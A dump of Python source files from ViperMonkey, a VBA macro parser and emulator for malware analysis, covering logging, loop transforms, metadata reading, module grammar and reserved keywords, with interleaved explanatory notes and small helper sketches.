| # ------------------------------------------------------------------------------ 50 | # TODO: 51 | 52 | # --- IMPORTS ------------------------------------------------------------------ 53 | 54 | import logging 55 | 56 | # === LOGGING ================================================================= 57 | 58 | class CappedFileHandler(logging.FileHandler): 59 | 60 | # default size cap of 30M 61 | # log file is put in the working directory with the same name 62 | def __init__(self, filename, sizecap, mode='w', encoding=None, delay=False): 63 | self.size_cap = sizecap 64 | self.current_size = 0 65 | self.cap_exceeded = False 66 | super(CappedFileHandler, self).__init__(filename, mode, encoding, delay) 67 | 68 | def emit(self, record): 69 | if not self.cap_exceeded: 70 | new_size = self.current_size + len(self.format(record)) 71 | if new_size
<= self.size_cap: 72 | self.current_size = new_size 73 | super(CappedFileHandler, self).emit(record) 74 | # regardless of whether or not a future log could be within the size cap, cut it off here 75 | else: 76 | self.cap_exceeded = True 77 | 78 | class DuplicateFilter(logging.Filter): 79 | 80 | def filter(self, record): 81 | # add other fields if you need more granular comparison, depends on your app 82 | current_log = (record.module, record.levelno, record.msg) 83 | if current_log != getattr(self, "last_log", None): 84 | self.last_log = current_log 85 | return True 86 | return False 87 | 88 | def get_logger(name, level=logging.NOTSET): 89 | """ 90 | Create a suitable logger object for this module. 91 | The goal is not to change settings of the root logger, to avoid getting 92 | other modules' logs on the screen. 93 | If a logger exists with same name, reuse it. (Else it would have duplicate 94 | handlers and messages would be doubled.) 95 | """ 96 | # First, test if there is already a logger with the same name, else it 97 | # will generate duplicate messages (due to duplicate handlers): 98 | if name in logging.Logger.manager.loggerDict: 99 | # NOTE: another less intrusive but more "hackish" solution would be to 100 | # use getLogger then test if its effective level is not default. 101 | logger = logging.getLogger(name) 102 | # make sure level is OK: 103 | logger.setLevel(level) 104 | # Skip duplicate log messages. 105 | logger.addFilter(DuplicateFilter()) 106 | return logger 107 | # get a new logger: 108 | logger = logging.getLogger(name) 109 | # only add a NullHandler for this logger, it is up to the application 110 | # to configure its own logging: 111 | logger.addHandler(logging.NullHandler()) 112 | logger.setLevel(level) 113 | # Skip duplicate log messages. 
114 | logger.addFilter(DuplicateFilter()) 115 | return logger 116 | 117 | 118 | # a global logger object used for debugging: 119 | log = get_logger('VMonkey') 120 | 121 | -------------------------------------------------------------------------------- /vipermonkey/core/loop_transform.py: -------------------------------------------------------------------------------- 1 | """ 2 | loop_transform.py - Transform certain types of loops into easier to emulate constructs. 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | #=== LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2019 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | import logging 40 | import re 41 | 42 | from logger import log 43 | import statements 44 | 45 | def _transform_dummy_loop1(loop): 46 | """ 47 | Transform useless loops like 'y = 20:Do While x < 100:If x = 6 Then y = 30:x = x + 1:Loop' to 48 | 'y = 30' 49 | """ 50 | 51 | # Do we have this sort of loop? 52 | loop_pat = r"Do\s+While\s+(\w+)\s*<\s*(\d+)\r?\n.{0,500}?Loop" 53 | loop_str = loop.original_str 54 | if (re.search(loop_pat, loop_str, re.DOTALL) is None): 55 | return loop 56 | 57 | # Pull out the loop variable and loop upper bound. 58 | info = re.findall(loop_pat, loop_str, re.DOTALL) 59 | loop_var = info[0][0].strip() 60 | loop_ub = int(info[0][1].strip()) 61 | 62 | # Pull out all the if statements that check to see if a variable is equal to 63 | # an integer constant. 64 | if_pat = r"If\s+\(?\s*(\w+)\s*=\s*(\d+)\s*\)\s+Then\s*\r?\n?(.{10,200}?)End\s+If" 65 | if_info = re.findall(if_pat, loop_str, re.DOTALL) 66 | if (len(if_info) == 0): 67 | return loop 68 | 69 | # Find all the if statements that will be taken if the loop runs to 70 | # completion. 71 | run_statements = [] 72 | for curr_if in if_info: 73 | 74 | # Get the variable being tested. 75 | test_var = curr_if[0].strip() 76 | 77 | # Get the value it's being checked against. 78 | test_val = int(curr_if[1].strip()) 79 | 80 | # Are we checking the loop variable? 
81 | if (test_var != loop_var): 82 | continue 83 | 84 | # Is the value being checked less than the loop upper bound? 85 | if (test_val >= loop_ub): 86 | continue 87 | 88 | # The test will eventually succeed. Save the statement being executed. 89 | run_statement = curr_if[2].strip() 90 | if (run_statement.endswith("Else")): 91 | run_statement = run_statement[:-len("Else")] 92 | run_statements.append(run_statement) 93 | 94 | # Did we find some things that are guaranteed to run in the loop? 95 | if (len(run_statements) == 0): 96 | return loop 97 | 98 | # We have simple if-statements that will always execute in the loop. 99 | # Assume that this loop is only here to foil emulation and replace it with 100 | # the statements that will always run from the loop. 101 | loop_repl = "" 102 | for run_statement in run_statements: 103 | loop_repl += run_statement + "\n" 104 | 105 | # Parse and return the loop replacement, if it works. 106 | import statements 107 | try: 108 | obj = statements.statement_block.parseString(loop_repl, parseAll=True)[0] 109 | except Exception: 110 | return loop 111 | return obj 112 | 113 | def _transform_wait_loop(loop): 114 | """ 115 | Transform useless loops like 'While x <> y:SomeFunctionCall():Wend' to 116 | 'SomeFunctionCall()' 117 | """ 118 | 119 | # Do we have this sort of loop? 120 | loop_pat = r"[Ww]hile\s+\w+\s*<>\s*\"?\w+\"?\r?\n.{0,500}?[Ww]end" 121 | loop_str = loop.original_str 122 | if (re.search(loop_pat, loop_str, re.DOTALL) is None): 123 | return loop 124 | 125 | # Is the loop body a single function call? 126 | if ((len(loop.body) > 1) or (len(loop.body) == 0) or 127 | (not isinstance(loop.body[0], statements.Call_Statement))): 128 | return loop 129 | 130 | # Just do the call once. 131 | log.warning("Transformed possible infinite wait loop...") 132 | return loop.body[0] 133 | 134 | def transform_loop(loop): 135 | """ 136 | Transform a given VBA_Object representing a loop into an easier to emulate construct. 
137 | """ 138 | 139 | # Sanity check.
140 | import statements 141 | if (not isinstance(loop, statements.While_Statement)): 142 | return loop 143 | 144 | # Try some canned transformations. 145 | r = _transform_dummy_loop1(loop) 146 | r = _transform_wait_loop(r) 147 | 148 | # Return the modified loop. 149 | return r 150 | -------------------------------------------------------------------------------- /vipermonkey/core/meta.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | ViperMonkey: Read in document metadata item. 4 | 5 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 6 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 7 | 8 | Author: Philippe Lagadec - http://www.decalage.info 9 | License: BSD, see source code or documentation 10 | 11 | Project Repository: 12 | https://github.com/decalage2/ViperMonkey 13 | """ 14 | 15 | import logging 16 | import subprocess 17 | 18 | from logger import log 19 | 20 | class FakeMeta(object): 21 | pass 22 | 23 | def get_metadata_exif(filename): 24 | 25 | # Use exiftool to get the document metadata. 26 | output = None 27 | try: 28 | output = subprocess.check_output(["exiftool", filename]) 29 | except Exception as e: 30 | log.error("Cannot read metadata with exiftool. " + str(e)) 31 | return {} 32 | 33 | # Sanity check results. 34 | if (log.getEffectiveLevel() == logging.DEBUG): 35 | log.debug("exiftool output: '" + str(output) + "'") 36 | if (":" not in output): 37 | log.warning("Cannot read metadata with exiftool.") 38 | return {} 39 | 40 | # Store the metadata in an object. 41 | lines = output.split("\n") 42 | r = FakeMeta() 43 | for line in lines: 44 | line = line.strip() 45 | if ((len(line) == 0) or (":" not in line)): 46 | continue 47 | field = line[:line.index(":")].strip().lower() 48 | val = line[line.index(":") + 1:].strip().replace("...", "\r\n") 49 | setattr(r, field, val) 50 | 51 | # Done. 
52 | return r 53 | -------------------------------------------------------------------------------- /vipermonkey/core/modules.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | ViperMonkey: VBA Grammar - Modules 4 | 5 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 6 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 7 | 8 | Author: Philippe Lagadec - http://www.decalage.info 9 | License: BSD, see source code or documentation 10 | 11 | Project Repository: 12 | https://github.com/decalage2/ViperMonkey 13 | """ 14 | 15 | # === LICENSE ================================================================== 16 | 17 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 18 | # All rights reserved. 19 | # 20 | # Redistribution and use in source and binary forms, with or without modification, 21 | # are permitted provided that the following conditions are met: 22 | # 23 | # * Redistributions of source code must retain the above copyright notice, this 24 | # list of conditions and the following disclaimer. 25 | # * Redistributions in binary form must reproduce the above copyright notice, 26 | # this list of conditions and the following disclaimer in the documentation 27 | # and/or other materials provided with the distribution. 28 | # 29 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 30 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 31 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 32 | # DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 33 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 34 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 35 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 36 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 37 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 38 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 39 | 40 | # For Python 2+3 support: 41 | from __future__ import print_function 42 | 43 | __version__ = '0.02' 44 | 45 | # --- IMPORTS ------------------------------------------------------------------ 46 | 47 | import logging 48 | 49 | from comments_eol import * 50 | from procedures import * 51 | from statements import * 52 | import vba_context 53 | from function_defn_visitor import * 54 | from vba_object import to_python 55 | 56 | from logger import log 57 | 58 | # === VBA MODULE AND STATEMENTS ============================================== 59 | 60 | # --- MODULE ----------------------------------------------------------------- 61 | 62 | class Module(VBA_Object): 63 | 64 | def _handle_func_decls(self, tokens): 65 | """ 66 | Look for functions/subs declared anywhere, including inside the body 67 | of other functions/subs. 68 | """ 69 | 70 | # Look through each parsed item in the module for function/sub 71 | # definitions. 72 | for token in tokens: 73 | if (not hasattr(token, "accept")): 74 | continue 75 | func_visitor = function_defn_visitor() 76 | token.accept(func_visitor) 77 | for i in func_visitor.func_objects: 78 | 79 | # Sub to add? 80 | if isinstance(i, Sub): 81 | if (log.getEffectiveLevel() == logging.DEBUG): 82 | log.debug("saving sub decl: %r" % i.name) 83 | self.subs[i.name] = i 84 | 85 | # Func to add? 
86 | elif isinstance(i, Function): 87 | if (log.getEffectiveLevel() == logging.DEBUG): 88 | log.debug("saving func decl: %r" % i.name) 89 | self.functions[i.name] = i 90 | 91 | # Property Let function to add? 92 | elif isinstance(i, PropertyLet): 93 | if (log.getEffectiveLevel() == logging.DEBUG): 94 | log.debug("saving property let decl: %r" % i.name) 95 | self.props[i.name] = i 96 | 97 | def __init__(self, original_str, location, tokens): 98 | 99 | super(Module, self).__init__(original_str, location, tokens) 100 | 101 | self.name = None 102 | self.code = None # set by ViperMonkey after parsing 103 | self.attributes = {} 104 | self.options = [] 105 | self.functions = {} 106 | self.props = {} 107 | self.external_functions = {} 108 | self.subs = {} 109 | self.global_vars = {} 110 | self.loose_lines = [] 111 | 112 | # Save all function/sub definitions. 113 | self._handle_func_decls(tokens) 114 | 115 | # Handle other statements. 116 | for token in tokens: 117 | 118 | if isinstance(token, If_Statement_Macro): 119 | for n in token.external_functions.keys(): 120 | if (log.getEffectiveLevel() == logging.DEBUG): 121 | log.debug("saving external func decl: %r" % n) 122 | self.external_functions[n] = token.external_functions[n] 123 | 124 | elif isinstance(token, External_Function): 125 | if (log.getEffectiveLevel() == logging.DEBUG): 126 | log.debug("saving external func decl: %r" % token.name) 127 | self.external_functions[token.name] = token 128 | 129 | elif isinstance(token, Attribute_Statement): 130 | if (log.getEffectiveLevel() == logging.DEBUG): 131 | log.debug("saving attrib decl: %r" % token.name) 132 | self.attributes[token.name] = token.value 133 | 134 | elif isinstance(token, Global_Var_Statement): 135 | 136 | # Global variable initialization is now handled by emulating the 137 | # LooseLines blocks of code in the module. 
138 | self.loose_lines.append(token) 139 | 140 | elif isinstance(token, Dim_Statement): 141 | 142 | # Global variable initialization is now handled by emulating the 143 | # LooseLines blocks of code in the module. 144 | self.loose_lines.append(token) 145 | 146 | elif isinstance(token, LooseLines): 147 | 148 | # Save the loose lines block itself. 149 | self.loose_lines.append(token) 150 | 151 | # Function and Sub definitions could be in the loose lines block. 152 | # Save those also. 153 | for curr_statement in token.block: 154 | if isinstance(curr_statement, External_Function): 155 | if (log.getEffectiveLevel() == logging.DEBUG): 156 | log.debug("saving external func decl: %r" % curr_statement.name) 157 | self.external_functions[curr_statement.name] = curr_statement 158 | 159 | self.name = self.attributes.get('VB_Name', None) 160 | 161 | def __repr__(self): 162 | r = 'Module %r\n' % self.name 163 | for sub in self.subs.values(): 164 | r += ' %r\n' % sub 165 | for func in self.functions.values(): 166 | r += ' %r\n' % func 167 | for extfunc in self.external_functions.values(): 168 | r += ' %r\n' % extfunc 169 | for prop in self.props.values(): 170 | r += ' %r\n' % prop 171 | return r 172 | 173 | def eval(self, context, params=None): 174 | 175 | # Perform all of the const assignments first. 176 | for block in self.loose_lines: 177 | if (isinstance(block, Sub) or 178 | isinstance(block, Function) or 179 | isinstance(block, External_Function)): 180 | if (log.getEffectiveLevel() == logging.DEBUG): 181 | log.debug("Skip loose line const eval of " + str(block)) 182 | continue 183 | if (isinstance(block, LooseLines)): 184 | context.global_scope = True 185 | do_const_assignments(block.block, context) 186 | context.global_scope = False 187 | 188 | # Emulate the loose line blocks (statements that appear outside sub/func 189 | # defs) in order.
190 | done_emulation = False 191 | for block in self.loose_lines: 192 | if (isinstance(block, Sub) or 193 | isinstance(block, Function) or 194 | isinstance(block, External_Function)): 195 | if (log.getEffectiveLevel() == logging.DEBUG): 196 | log.debug("Skip loose line eval of " + str(block)) 197 | continue 198 | context.global_scope = True 199 | block.eval(context, params) 200 | context.global_scope = False 201 | done_emulation = True 202 | 203 | # Return if we ran anything. 204 | return done_emulation 205 | 206 | def to_python(self, context, params=None, indent=0): 207 | return to_python(self.loose_lines, context, indent=indent, statements=True) 208 | 209 | def load_context(self, context): 210 | """ 211 | Load functions/subs defined in the module into the given 212 | context. 213 | """ 214 | 215 | for name, _sub in self.subs.items(): 216 | if (log.getEffectiveLevel() == logging.DEBUG): 217 | log.debug('(1) storing sub "%s" in globals' % name) 218 | context.set(name, _sub) 219 | context.set(name, _sub, force_global=True) 220 | for name, _function in self.functions.items(): 221 | if (log.getEffectiveLevel() == logging.DEBUG): 222 | log.debug('(1) storing function "%s" in globals' % name) 223 | context.set(name, _function) 224 | context.set(name, _function, force_global=True) 225 | for name, _prop in self.props.items(): 226 | if (log.getEffectiveLevel() == logging.DEBUG): 227 | log.debug('(1) storing property let "%s" in globals' % name) 228 | context.set(name, _prop) 229 | context.set(name, _prop, force_global=True) 230 | for name, _function in self.external_functions.items(): 231 | if (log.getEffectiveLevel() == logging.DEBUG): 232 | log.debug('(1) storing external function "%s" in globals' % name) 233 | context.set(name, _function) 234 | for name, _var in self.global_vars.items(): 235 | if (log.getEffectiveLevel() == logging.DEBUG): 236 | log.debug('(1) storing global var "%s" = %s in globals (1)' % (name, str(_var))) 237 | if (isinstance(name, str)): 238 | 
context.set(name, _var) 239 | context.set(name, _var, force_global=True) 240 | if (isinstance(name, list)): 241 | context.set(name[0], _var, var_type=name[1]) 242 | context.set(name[0], _var, var_type=name[1], force_global=True) 243 | 244 | # see MS-VBAL 4.2 Modules 245 | # 246 | # MS-GRAMMAR: procedural_module_header = CaselessKeyword('Attribute') + CaselessKeyword('VB_Name') + Literal('=') + quoted_string 247 | # MS-GRAMMAR: procedural_module = procedural_module_header + procedural_module_body 248 | # MS-GRAMMAR: class_module = class_module_header + class_module_body 249 | # MS-GRAMMAR: module = procedural_module | class_module 250 | 251 | # Module Header: 252 | 253 | header_statement = attribute_statement 254 | # TODO: can we have '::' with an empty statement? 255 | header_statements_line = (Optional(header_statement + ZeroOrMore(Suppress(':') + header_statement)) + EOL.suppress()) | \ 256 | option_statement | \ 257 | type_declaration | \ 258 | simple_if_statement_macro 259 | module_header = ZeroOrMore(header_statements_line) 260 | 261 | # 5.1 Module Body Structure 262 | 263 | # 5.2 Module Declaration Section Structure 264 | 265 | # TODO: 5.2.1 Option Directives 266 | # TODO: 5.2.2 Implicit Definition Directives 267 | # TODO: 5.2.3 Module Declarations 268 | 269 | loose_lines = Forward() 270 | #declaration_statement = external_function | global_variable_declaration | loose_lines | option_statement | dim_statement | rem_statement 271 | declaration_statement = external_function | loose_lines | global_variable_declaration | \ 272 | option_statement | dim_statement | rem_statement | type_declaration 273 | declaration_statements_line = Optional(declaration_statement + ZeroOrMore(Suppress(':') + declaration_statement)) \ 274 | + EOL.suppress() 275 | 276 | module_declaration = ZeroOrMore(declaration_statements_line) 277 | 278 | # 5.3 Module Code Section Structure 279 | 280 | # TODO: 5.3.1 Procedure Declarations 281 | 282 | # TODO: add rem statement and others?
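The `header_statements_line` and `declaration_statements_line` rules above accept several statements on one physical line, separated by `:`. As a rough, stdlib-only sketch of that idea (not ViperMonkey's pyparsing grammar), the hypothetical helper `split_statements` below splits a VBA line on `:` while ignoring colons inside double-quoted string literals and dropping a trailing `'` comment. It assumes `""` is the only escape inside strings and does not treat line labels such as `Label1:` specially.

```python
def split_statements(line):
    """Split one VBA source line on ':' separators outside string literals.

    Illustrative assumptions (not ViperMonkey's parser):
    - string literals use double quotes, with "" as an escaped quote;
    - a single quote outside a string starts a comment to end of line;
    - line labels such as "Label1:" are not handled specially.
    """
    parts = []
    current = []
    in_string = False
    for ch in line:
        if ch == '"':
            # Toggling on every quote also handles the "" escape: the pair
            # toggles out of the string and straight back in.
            in_string = not in_string
            current.append(ch)
        elif ch == "'" and not in_string:
            break  # the rest of the line is a comment
        elif ch == ":" and not in_string:
            parts.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
    parts.append("".join(current).strip())
    # Drop empty pieces, e.g. from "a = 1::b = 2" or a trailing ':'.
    return [p for p in parts if p]
```

For example, `split_statements('Dim a: a = "x:y": b = 2')` yields `['Dim a', 'a = "x:y"', 'b = 2']`. Silently dropping empty pieces is one possible design choice for the `'::'` TODO in the grammar. Whether VBA itself accepts such lines should be checked against MS-VBAL.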
283 | empty_line = EOL.suppress() 284 | 285 | pointless_empty_tuple = Suppress('(') + Suppress(')') 286 | 287 | class LooseLines(VBA_Object): 288 | """ 289 | A list of Visual Basic statements that don't appear in a Sub or Function. 290 | This is mainly applicable to VBScript files. 291 | """ 292 | 293 | def __init__(self, original_str, location, tokens): 294 | super(LooseLines, self).__init__(original_str, location, tokens) 295 | self.block = tokens.block 296 | log.info('parsed %r' % self) 297 | 298 | def __repr__(self): 299 | s = repr(self.block) 300 | if (len(s) > 35): 301 | s = s[:35] + " ...)" 302 | return 'Loose Lines Block: %s: %s statement(s)' % (s, len(self.block)) 303 | 304 | def to_python(self, context, params=None, indent=0): 305 | return to_python(self.block, context, indent=indent, statements=True) 306 | 307 | def eval(self, context, params=None): 308 | 309 | # Exit if an exit function statement was previously called. 310 | #if (context.exit_func): 311 | # return 312 | 313 | # Assign all const variables first. 314 | do_const_assignments(self.block, context) 315 | 316 | # Emulate the statements in the block. 317 | log.info("Emulating " + str(self) + " ...") 318 | context.global_scope = True 319 | for curr_statement in self.block: 320 | 321 | # Don't emulate declared functions. 322 | if (isinstance(curr_statement, Sub) or 323 | isinstance(curr_statement, Function) or 324 | isinstance(curr_statement, External_Function)): 325 | if (log.getEffectiveLevel() == logging.DEBUG): 326 | log.debug("Skip loose line eval of " + str(curr_statement)) 327 | continue 328 | 329 | # Is this something we can emulate? 330 | if (not isinstance(curr_statement, VBA_Object)): 331 | continue 332 | curr_statement.eval(context, params=params) 333 | 334 | # Was there an error that will make us jump to an error handler?
335 | if (context.must_handle_error()): 336 | break 337 | context.clear_error() 338 | 339 | # Run the error handler if we have one and we broke out of the statement 340 | # loop with an error. 341 | context.handle_error(params) 342 | 343 | loose_lines <<= OneOrMore(pointless_empty_tuple ^ simple_call_list ^ tagged_block ^ (block_statement + EOS.suppress()) ^ orphaned_marker)('block') 344 | loose_lines.setParseAction(LooseLines) 345 | 346 | # TODO: add optional empty lines after each sub/function? 347 | module_code = ZeroOrMore( 348 | option_statement 349 | | sub 350 | | function 351 | | property_let 352 | | Suppress(empty_line) 353 | | simple_if_statement_macro 354 | | loose_lines 355 | | type_declaration 356 | ) 357 | 358 | module_body = module_declaration + module_code 359 | 360 | #module = module_header + module_body 361 | module = ZeroOrMore( 362 | option_statement 363 | | sub 364 | | function 365 | | property_let 366 | | Suppress(empty_line) 367 | | simple_if_statement_macro 368 | | loose_lines 369 | | type_declaration 370 | | declaration_statements_line 371 | | header_statements_line 372 | ) 373 | module.setParseAction(Module) 374 | 375 | # === LINE PARSER ============================================================ 376 | 377 | # Parser matching any line of VBA code: 378 | vba_line = ( 379 | sub_start_line 380 | | sub_end 381 | | function_start 382 | | function_end 383 | | for_start 384 | | for_end 385 | | header_statements_line 386 | # check if we have a basic literal before checking simple_statement_line 387 | # otherwise we will get things like "Chr(36)" being reported as a Call_Statement 388 | | (expr_const + EOL.suppress()) 389 | | simple_statements_line 390 | | declaration_statements_line 391 | | empty_line 392 | | (expression + EOL.suppress()) 393 | ) 394 | -------------------------------------------------------------------------------- /vipermonkey/core/reserved.py: -------------------------------------------------------------------------------- 1 | 
#!/usr/bin/env python 2 | """ 3 | ViperMonkey: VBA Grammar - Reserved Keywords 4 | 5 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 6 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 7 | 8 | Author: Philippe Lagadec - http://www.decalage.info 9 | License: BSD, see source code or documentation 10 | 11 | Project Repository: 12 | https://github.com/decalage2/ViperMonkey 13 | """ 14 | 15 | # === LICENSE ================================================================== 16 | 17 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 18 | # All rights reserved. 19 | # 20 | # Redistribution and use in source and binary forms, with or without modification, 21 | # are permitted provided that the following conditions are met: 22 | # 23 | # * Redistributions of source code must retain the above copyright notice, this 24 | # list of conditions and the following disclaimer. 25 | # * Redistributions in binary form must reproduce the above copyright notice, 26 | # this list of conditions and the following disclaimer in the documentation 27 | # and/or other materials provided with the distribution. 28 | # 29 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 30 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 31 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 32 | # DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 33 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 34 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 35 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 36 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 37 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 38 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 39 | 40 | __version__ = '0.02' 41 | 42 | # --- IMPORTS ------------------------------------------------------------------ 43 | 44 | from pyparsing import * 45 | 46 | from logger import log 47 | from identifiers import * 48 | 49 | # --- RESERVED KEYWORDS ------------------------------------------------------ 50 | 51 | def caselessKeywordsList(keywords): 52 | """ 53 | build a pyparsing parser from a list of caseless keywords 54 | 55 | :param keywords: tuple or list of keyword names (strings) 56 | """ 57 | # start with the first keyword: 58 | p = CaselessKeyword(keywords[0]) 59 | # then add all the other keywords: 60 | for kw in keywords[1:]: 61 | p |= CaselessKeyword(kw) 62 | return p 63 | 64 | # 3.3.5.2 Reserved Identifiers and IDENTIFIER 65 | # A <statement-keyword> is a <reserved-identifier> that is the first syntactic item of a statement or 66 | # declaration.
67 | statement_keyword = caselessKeywordsList( 68 | ("Call", "Const", "Declare", "DefBool", "DefByte", 69 | "DefCur", "DefDate", "DefDbl", "DefInt", "DefLng", "DefLngLng", "DefLngPtr", "DefObj", 70 | "DefSng", "DefStr", "DefVar", "Dim", "Do", "Else", "ElseIf", "End If", 71 | "Enum", "Event", "Exit", "Friend", "Function", 72 | "GoSub", "GoTo", "If", "Implements", "Let", "Loop", "LSet", "Next", 73 | "On", "Open", "Option", "Private", "Public", "RaiseEvent", "ReDim", 74 | "Resume", "RSet", "Select", "Set", "Static", "Stop", "Sub", 75 | "Unlock", "Wend", "While", "With")) 76 | 77 | rem_keyword = CaselessKeyword("Rem") 78 | 79 | # A <marker-keyword> is a <reserved-identifier> that is used as part of the interior 80 | # syntactic structure of a statement. 81 | marker_keyword = caselessKeywordsList( 82 | ("As", "ByRef", "ByVal", "Case", "For", "Each", "Else", "In", "New", 83 | "Shared", "Until", "WithEvents", "Optional", "ParamArray", "Preserve", 84 | "Tab", "Then")) 85 | 86 | # An <operator-identifier> is a <reserved-identifier> that is used 87 | # as an operator within expressions. 88 | operator_identifier = caselessKeywordsList( 89 | ("AddressOf", "And", "Eqv", "Imp", "Is", "Like", "New", "Mod", 90 | "Not", "Or", "TypeOf", "Xor")) 91 | 92 | # A <reserved-name> is a <reserved-identifier> that is used within expressions 93 | # as if it was a normal program defined entity (section 2.2). 94 | reserved_name = caselessKeywordsList(( # TODO: fix this one! 95 | "CBool", "CByte", "CCur", "CDate", # "CDbl", "CDec", "CInt", 96 | "CLng", "CLngLng", "CLngPtr", "CSng", "CStr", "CVar", "CVErr", 97 | "DoEvents", "Fix", "Int", "Len", "LenB", "PSet", "Sgn", "String")) 98 | 99 | # A <special-form> is a <reserved-identifier> that is used in an expression as 100 | # if it was a program defined procedure name but which has special syntactic rules for 101 | # its argument. 102 | special_form = caselessKeywordsList(( 103 | "Array", "Circle", "InputB", "LBound", "UBound")) 104 | 105 | # A <reserved-type-identifier> is used within a declaration to identify the specific 106 | # declared type (section 2.2) of an entity.
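`caselessKeywordsList` ORs together pyparsing `CaselessKeyword` objects, each of which matches case-insensitively and refuses to match when the neighboring character is an identifier character. The sketch below approximates that behavior with the standard `re` module. The helper name `caseless_keywords_regex` is hypothetical, and the identifier character set `[A-Za-z0-9_$]` is an assumption modeled on pyparsing's default keyword characters. The sketch also shows why a keyword string with a stray trailing space, such as `"ByVal "`, is fragile: the space becomes a required literal, so `ByVal` followed by a tab no longer matches.

```python
import re

# Characters treated as part of an identifier (assumed: letters, digits, '_', '$').
_IDENT = r"[A-Za-z0-9_$]"


def caseless_keywords_regex(keywords):
    """Compile a regex matching any of `keywords` case-insensitively, but only
    when the match is not embedded in a longer identifier."""
    alternation = "|".join(re.escape(kw) for kw in keywords)
    # The negative lookbehind/lookahead stand in for CaselessKeyword's
    # boundary checks. If "Else" is tried first on "ElseIf", the lookahead
    # fails and the engine backtracks to try "ElseIf".
    return re.compile(
        r"(?<!" + _IDENT + r")(?:" + alternation + r")(?!" + _IDENT + r")",
        re.IGNORECASE,
    )


if __name__ == "__main__":
    pat = caseless_keywords_regex(["Dim", "Else", "ElseIf", "ByVal"])
    print(pat.match("ELSEIF x > 1").group(0))  # ELSEIF
    print(pat.match("Dimension = 1"))  # None: "Dim" is part of a longer identifier
    print(caseless_keywords_regex(["ByVal "]).match("ByVal\tx"))  # None: trailing space is literal
```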
